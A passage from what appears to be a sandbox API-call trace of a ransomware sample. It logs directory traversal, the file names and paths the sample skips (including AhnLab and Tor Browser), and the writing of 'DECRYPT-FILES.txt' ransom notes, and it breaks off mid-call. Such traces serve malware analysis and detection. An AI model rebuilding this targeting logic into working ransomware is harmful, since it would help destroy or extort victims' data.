(lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.942] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.942] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.942] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.942] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.942] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.942] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.942] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.942] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0087.942] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.942] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0087.942] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\jkbimi8.tmp" [0087.943] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.943] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.943] CloseHandle (hObject=0x0) returned 0 [0087.943] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.943] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66fe9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x93e4774a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0087.943] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0087.943] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0087.943] lstrcatW (in: lpString1="Local", lpString2="\\" | out: lpString1="Local\\") returned="Local\\" [0087.943] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Local\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0087.943] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Program Files") returned 0x0 [0087.943] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch=":\\Windows") returned 0x0 [0087.943] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Games\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\All Users") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\AppData\\Local") returned="\\AppData\\Local\\" [0087.944] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0087.944] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0087.944] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0087.944] lstrcatW (in: lpString1="LocalLow", lpString2="\\" | out: lpString1="LocalLow\\") returned="LocalLow\\" [0087.944] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="LocalLow\\" | out: lpString1="C:\\Users\\Default\\AppData\\LocalLow\\") returned="C:\\Users\\Default\\AppData\\LocalLow\\" [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Program Files") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch=":\\Windows") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Games\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\All Users") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\AppData\\Local") returned="\\AppData\\LocalLow\\" [0087.944] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0087.944] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0087.944] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0087.944] lstrcatW (in: lpString1="Roaming", lpString2="\\" | out: lpString1="Roaming\\") returned="Roaming\\" [0087.944] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Roaming\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Program Files") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch=":\\Windows") returned 0x0 [0087.944] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Games\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\All Users") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="AhnLab") returned 0x0 [0087.945] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.945] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0087.945] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.945] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\jkbimi8.tmp") returned 45 [0087.945] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0087.946] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0087.946] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.946] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\DECRYPT-FILES.txt") returned 51 [0087.946] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0087.948] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0087.949] CloseHandle (hObject=0x414) returned 1 [0087.949] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0087.949] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0087.949] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0087.950] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.950] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.950] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.950] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.950] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.950] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.950] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0087.950] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0087.950] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0087.950] lstrcatW (in: lpString1="Identities", lpString2="\\" | out: lpString1="Identities\\") returned="Identities\\" [0087.950] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Identities\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\" [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Program Files") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch=":\\Windows") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Games\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\All Users") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\IETldCache\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Local Settings\\") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\AppData\\Local") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="AhnLab") returned 0x0 [0087.950] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0087.950] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0087.950] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.950] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\jkbimi8.tmp") returned 56 [0087.951] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0087.951] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0087.951] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0087.951] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt") returned 62 [0087.951] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0087.953] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0087.954] CloseHandle (hObject=0x42c) returned 1 [0087.954] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0087.954] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*" [0087.954] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0087.954] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.954] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.954] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.954] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.954] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0087.954] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0087.954] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0087.954] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0087.955] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0087.955] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.955] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0087.955] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0087.955] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0087.955] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0087.955] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0087.955] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0087.955] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Identities\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\" [0087.955] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\jkbimi8.tmp" [0087.955] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.955] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0087.955] CloseHandle (hObject=0x0) returned 0 [0087.955] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.956] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0087.956] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0087.956] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0087.956] lstrcatW (in: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\" | out: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0087.956] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Program Files") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch=":\\Windows") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Games\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.956] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", 